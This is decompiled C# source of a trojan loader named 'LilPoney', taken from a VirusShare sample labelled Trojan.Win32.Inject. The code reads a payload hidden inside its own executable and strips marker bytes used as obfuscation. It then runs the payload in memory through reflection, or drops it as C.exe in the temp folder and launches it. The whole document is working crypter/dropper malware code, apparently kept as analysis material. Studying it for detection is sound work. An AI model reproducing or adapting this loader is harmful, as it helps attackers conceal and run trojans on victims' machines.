// Decompiled with JetBrains decompiler
// Type: LilPoney.Program
// Assembly: LilPoney, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1C63AA57-9559-4CD2-A85A-70799118F319
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Inject.aagsb-7963deb448437c7505789ca0bcb4b13edfc5b040b6004eeb17e9d495e54067ff.exe

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;

namespace LilPoney
{
  internal class Program
  {
    private static byte[] CRYPT_KEY = new byte[8]
    {
      (byte) 5,
      (byte) 6,
      (byte) 21,
      (byte) 22,
      (byte) 64,
      (byte) 69,
      (byte) 133,
      (byte) 101
    };
    private static byte[] SPLIT_KEY = new byte[8]
    {
      (byte) 5,
      (byte) 69,
      (byte) 135,
      (byte) 24,
      (byte) 38,
      (byte) 20,
      (byte) 8,
      (byte) 119
    };

    private static void Main(string[] args)
    {
      byte[] numArray = new byte[0];
      StreamReader streamReader = new StreamReader(Process.GetCurrentProcess().MainModule.FileName);
      byte[] bytesWithoutCrypt = Program.getAllBytesWithoutCrypt(Program.getAllBytesWithoutStub(new BinaryReader(streamReader.BaseStream).ReadBytes(Convert.ToInt32(streamReader.BaseStream.Length))));
      if (Program.onRunExeByteArray(bytesWithoutCrypt))
        return;
      StreamWriter streamWriter = new StreamWriter(Path.GetTempPath() + "C.exe");
      foreach (byte num in bytesWithoutCrypt)
        streamWriter.BaseStream.WriteByte(num);
      streamWriter.Close();
      Process.Start(Path.GetTempPath() + "C.exe");
    }

    private static byte[] getAllBytesWithoutStub(byte[] allBytes)
    {
      List<byte> byteList = new List<byte>();
      int num = 0;
      bool flag = false;
      for (int index1 = 0; index1 < allBytes.Length; ++index1)
      {
        if ((int) allBytes[index1] == (int) Program.SPLIT_KEY[0] && num < 2)
        {
          for (int index2 = 0; index2 < Program.SPLIT_KEY.Length && (int) allBytes[index1 + index2] == (int) Program.SPLIT_KEY[index2]; ++index2)
          {
            if (index2 == Program.SPLIT_KEY.Length - 1)
            {
              ++num;
              index1 += index2;
            }
          }
        }
        if (num == 2)
        {
          if (!flag)
            flag = true;
          else
            byteList.Add(allBytes[index1]);
        }
      }
      return byteList.ToArray();
    }

    private static byte[] getAllBytesWithoutCrypt(byte[] allBytes)
    {
      List<byte> byteList = new List<byte>();
      bool flag = false;
      for (int index1 = 0; index1 < allBytes.Length; ++index1)
      {
        if ((int) allBytes[index1] == (int) Program.CRYPT_KEY[0])
        {
          for (int index2 = 0; index2 < Program.CRYPT_KEY.Length && (int) allBytes[index1 + index2] == (int) Program.CRYPT_KEY[index2]; ++index2)
          {
            if (index2 == Program.CRYPT_KEY.Length - 1)
            {
              flag = true;
              index1 += index2;
            }
          }
        }
        if (!flag)
          byteList.Add(allBytes[index1]);
        flag = false;
      }
      return byteList.ToArray();
    }

    private static bool onRunExeByteArray(byte[] allBytes)
    {
      try
      {
        Assembly assembly = Assembly.Load(allBytes);
        MethodInfo entryPoint = assembly.EntryPoint;
        if ((object) entryPoint != null)
        {
          object instance = assembly.CreateInstance(entryPoint.Name);
          entryPoint.Invoke(instance, (object[]) null);
        }
      }
      catch (Exception ex)
      {
        return false;
      }
      return true;
    }
  }
}